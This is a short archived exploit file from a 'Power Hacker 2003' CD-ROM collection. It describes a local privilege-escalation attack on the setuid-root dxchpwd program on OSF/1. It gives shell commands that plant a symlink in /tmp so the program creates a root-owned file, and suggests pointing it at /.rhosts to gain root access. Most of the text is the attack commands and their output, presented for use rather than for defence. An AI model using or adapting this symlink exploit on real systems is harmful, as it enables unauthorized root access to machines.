home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / OSF1_dxchpwd < prev    next >
Encoding:
Text File  |  2001-11-06  |  666 b   |  20 lines
  1. In this case, if /.rhosts were symlinked to /tmp/dxchpwd.log, then a
  2. host known as Unknown could possibly gain root access.
  3.  
  4. Example:
  5. $ ls -l /usr/tcb/bin/dxchpwd
  6. -rwsr-xr-x   1 root     bin        49152 Jul 25  1995 /usr/tcb/bin/dxchpwd
  7. $ ls -l /tmp/dxchpwd.log
  8. /tmp/dxchpwd.log not found
  9. $ export DISPLAY=:0     (or a remotehost)
  10. $ ln -s /hackfile /tmp/dxchpwd
  11. $ ls -l /hackfile
  12. /hackfile not found
  13. $ /usr/tcb/bin/dxchpwd
  14. (The dxchpwd window will appear. Just enter root for username
  15.  and anything for the passwd. You'll get a permission denied
  16. message and the window will close.)
  17. $ ls -l /hackfile
  18. -rw-------   1 root     system         0 Nov 16 22:44 /hackfile
  19.  
  20.